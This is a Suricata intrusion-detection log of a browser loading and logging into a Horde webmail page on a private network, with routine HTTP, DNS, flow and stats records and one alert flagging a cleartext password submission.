{"timestamp":"2020-02-29T00:24:48.420446+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53108,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":5873,"tx_id":0}} {"timestamp":"2020-02-29T00:24:48.424060+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141}} {"timestamp":"2020-02-29T00:24:48.425400+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53110,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/mozilla.css","state":"CLOSED","stored":false,"size":173,"tx_id":0}} 
{"timestamp":"2020-02-29T00:24:48.428962+0000","flow_id":2226118850538449,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53114,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236}} {"timestamp":"2020-02-29T00:24:48.430576+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005}} {"timestamp":"2020-02-29T00:24:48.432132+0000","flow_id":1027445017833512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53118,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280}} 
{"timestamp":"2020-02-29T00:24:48.432491+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53110,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005},"app_proto":"http","fileinfo":{"filename":"\/js\/accesskeys.js","state":"CLOSED","stored":false,"size":2729,"tx_id":1}} {"timestamp":"2020-02-29T00:24:48.432746+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258}} {"timestamp":"2020-02-29T00:24:48.429717+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53108,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246}} 
{"timestamp":"2020-02-29T00:24:48.430661+0000","flow_id":1391374776691898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53116,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118}} {"timestamp":"2020-02-29T00:24:48.448591+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53112,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31816},"app_proto":"http","fileinfo":{"filename":"\/js\/prototype.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:24:48.450066+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":46054}} 
{"timestamp":"2020-02-29T00:24:48.513328+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:24:48.575865+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53112,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-default.png","state":"CLOSED","stored":false,"size":87,"tx_id":1}} {"timestamp":"2020-02-29T00:24:48.576235+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918}} 
{"timestamp":"2020-02-29T00:24:49.000298+0000","event_type":"stats","stats":{"uptime":15141,"capture":{"kernel_packets":140362,"kernel_drops":0},"decoder":{"pkts":140368,"bytes":96376832,"invalid":195,"ipv4":138787,"ipv6":10,"ethernet":140368,"raw":0,"null":0,"sll":0,"tcp":133233,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088416},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2869,"new_pruned":17,"est_pruned":2520,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":1,"flows_timeout":4,"flows_timeout_inuse":2,"flows_removed":2,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":12884,"memcap_state":0,"memcap_global":0},"http":{"memuse":259172,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:49.001045+0000","flow_id":2154259743701700,"event_type":"flow","src_ip":"192.168.10.130","src_port":34274,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":39,"pkts_toclient":66,"bytes_toserver":5625,"bytes_toclient":81171,"start":"2020-02-29T00:22:30.916164+0000","end":"2020-02-29T00:22:36.258283+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:49.001535+0000","flow_id":1798765300213308,"event_type":"flow","src_ip":"192.168.10.130","src_port":34272,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":37,"pkts_toclient":73,"bytes_toserver":4670,"bytes_toclient":95925,"start":"2020-02-29T00:22:24.976444+0000","end":"2020-02-29T00:22:30.123349+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:50.000647+0000","flow_id":1638833592828724,"event_type":"flow","src_ip":"192.168.10.122","src_port":48417,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:49.688948+0000","end":"2020-02-29T00:19:49.800136+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:24:51.000340+0000","flow_id":1012257993948441,"event_type":"flow","src_ip":"192.168.10.122","src_port":39263,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:50.490777+0000","end":"2020-02-29T00:19:50.601928+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:51.001295+0000","flow_id":545992049333857,"event_type":"flow","src_ip":"192.168.10.122","src_port":59343,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:50.628321+0000","end":"2020-02-29T00:19:50.736476+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:51.001598+0000","flow_id":559357987575908,"event_type":"flow","src_ip":"192.168.10.122","src_port":54554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:50.252004+0000","end":"2020-02-29T00:19:50.360299+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:53.433983+0000","flow_id":2226118850538449,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53114,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236},"app_proto":"http","fileinfo":{"filename":"\/js\/horde.js","state":"CLOSED","stored":false,"size":6422,"tx_id":0}} {"timestamp":"2020-02-29T00:24:53.434123+0000","flow_id":1027445017833512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53118,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/login.js","state":"CLOSED","stored":false,"size":415,"tx_id":0}} {"timestamp":"2020-02-29T00:24:53.434165+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53110,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/horde-power1.png","state":"CLOSED","stored":false,"size":2258,"tx_id":2}} 
{"timestamp":"2020-02-29T00:24:53.434077+0000","flow_id":1391374776691898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53116,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118},"app_proto":"http","fileinfo":{"filename":"\/js\/login.js","state":"CLOSED","stored":false,"size":3062,"tx_id":0}} {"timestamp":"2020-02-29T00:24:53.434898+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53108,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":48239,"tx_id":1}} {"timestamp":"2020-02-29T00:24:53.581143+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53112,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":918,"tx_id":2}} {"timestamp":"2020-02-29T00:24:54.000497+0000","flow_id":1486409513894428,"event_type":"flow","src_ip":"192.168.10.130","src_port":34280,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":32,"pkts_toclient":64,"bytes_toserver":3501,"bytes_toclient":80837,"start":"2020-02-29T00:23:45.393756+0000","end":"2020-02-29T00:23:50.437750+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:54.000728+0000","flow_id":231209601455855,"event_type":"flow","src_ip":"192.168.10.122","src_port":33684,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:53.120559+0000","end":"2020-02-29T00:19:53.229605+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:55.000492+0000","flow_id":2148994103536245,"event_type":"flow","src_ip":"192.168.10.122","src_port":50516,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:19:54.289397+0000","end":"2020-02-29T00:19:54.400745+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:24:56.000214+0000","event_type":"stats","stats":{"uptime":15148,"capture":{"kernel_packets":140517,"kernel_drops":0},"decoder":{"pkts":140526,"bytes":96460879,"invalid":195,"ipv4":138945,"ipv6":10,"ethernet":140526,"raw":0,"null":0,"sll":0,"tcp":133391,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087552},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2889,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2905,"synack":2896,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1904,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4922,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2871,"new_pruned":17,"est_pruned":2525,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10899,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:56.288577+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52541,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:24:56.397551+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52541,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.397551+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52541,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:24:56.412364+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52542,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:24:56.520432+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52542,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.520432+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52542,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:24:56.531252+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012887,"rev":3,"signature":"ET POLICY Http Client Body contains pass= in cleartext","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:24:56.531252+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:24:56.531252+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":113,"tx_id":0}} {"timestamp":"2020-02-29T00:24:56.554604+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50033,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19211,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:24:56.663729+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19211,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.663729+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19211,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:24:56.845414+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50033,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19212,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:24:56.953878+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19212,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:24:56.953878+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19212,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:24:57.000273+0000","flow_id":1727159595722396,"event_type":"flow","src_ip":"192.168.10.122","src_port":51027,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:56.485020+0000","end":"2020-02-29T00:19:56.595891+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:57.177311+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8192}} 